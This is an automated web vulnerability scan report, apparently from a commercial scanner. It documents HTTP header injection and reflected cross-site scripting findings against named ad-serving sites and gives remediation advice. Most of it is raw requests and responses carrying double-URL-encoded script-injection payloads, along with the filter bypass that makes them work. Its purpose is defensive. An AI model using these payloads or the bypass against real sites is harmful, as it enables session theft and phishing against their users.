HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 2161b%0d%0ad9dd7e4e338 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2161b%0d%0ad9dd7e4e338/dclk.beacon/beacon1 HTTP/1.1 Host: www.destinationurl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2161b d9dd7e4e338/dclk.beacon/beacon1: Date: Sun, 19 Dec 2010 18:33:52 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 15e15%0d%0ad4200a93b03 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /15e15%0d%0ad4200a93b03/dclk.beaconreceived/ HTTP/1.1 Host: www.destinationurl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/15e15 d4200a93b03/dclk.beaconreceived/: Date: Sun, 19 Dec 2010 18:33:54 GMT Server: GFE/2.0 Connection: close
<h1>Error 302 Moved Temporarily</h1>
2. Cross-site scripting (reflected)previous There are 613 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98 was submitted in the REST URL parameter 2. This input was echoed as d70c2"><script>alert(1)</script>edcf3732e98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98/561.0.iframe.120x30/1292781815776969 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357d70c2"><script>alert(1)</script>edcf3732e98/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20 was submitted in the REST URL parameter 2. This input was echoed as b1f7a";alert(1)//e814149ac20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20/561.0.iframe.120x30/1292781815776969 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a";alert(1)//e814149ac20/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a was submitted in the REST URL parameter 3. This input was echoed as 351b5";alert(1)//463fb0d5a8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a/1292781815776969 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5";alert(1)//463fb0d5a8a/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442 was submitted in the REST URL parameter 3. This input was echoed as f7d5b"><script>alert(1)</script>e29654e3442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442/1292781815776969 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b"><script>alert(1)</script>e29654e3442/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af was submitted in the REST URL parameter 2. This input was echoed as f090d"><script>alert(1)</script>e24cabfa7af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af/561.0.iframe.120x30/1292781816** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357f090d"><script>alert(1)</script>e24cabfa7af/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6 was submitted in the REST URL parameter 2. This input was echoed as 7e78a";alert(1)//79b3c23bea6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6/561.0.iframe.120x30/1292781816** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a";alert(1)//79b3c23bea6/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9 was submitted in the REST URL parameter 3. This input was echoed as 481cf";alert(1)//b8c97658fa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9/1292781816** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf";alert(1)//b8c97658fa9/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140 was submitted in the REST URL parameter 3. This input was echoed as f9245"><script>alert(1)</script>d30d10f1140 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140/1292781816** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245"><script>alert(1)</script>d30d10f1140/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b792%2522%253balert%25281%2529%252f%252fba89bde7c7b was submitted in the REST URL parameter 2. This input was echoed as 4b792";alert(1)//ba89bde7c7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792%2522%253balert%25281%2529%252f%252fba89bde7c7b/561.0.iframe.120x30/1292781871** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792";alert(1)//ba89bde7c7b/561.0.iframe.120x30/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0 was submitted in the REST URL parameter 2. This input was echoed as 601d4"><script>alert(1)</script>9e988e2cfa0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0/561.0.iframe.120x30/1292781871** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357601d4"><script>alert(1)</script>9e988e2cfa0/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4831c%2522%253balert%25281%2529%252f%252f90c3c0b2505 was submitted in the REST URL parameter 3. This input was echoed as 4831c";alert(1)//90c3c0b2505 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c%2522%253balert%25281%2529%252f%252f90c3c0b2505/1292781871** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c";alert(1)//90c3c0b2505/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66 was submitted in the REST URL parameter 3. This input was echoed as 81ecb"><script>alert(1)</script>80e4aff9d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66/1292781871** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb"><script>alert(1)</script>80e4aff9d66/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774e0%2522%253balert%25281%2529%252f%252fc797c1e1737 was submitted in the REST URL parameter 2. This input was echoed as 774e0";alert(1)//c797c1e1737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0%2522%253balert%25281%2529%252f%252fc797c1e1737/561.0.iframe.120x30/1292781871793740 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
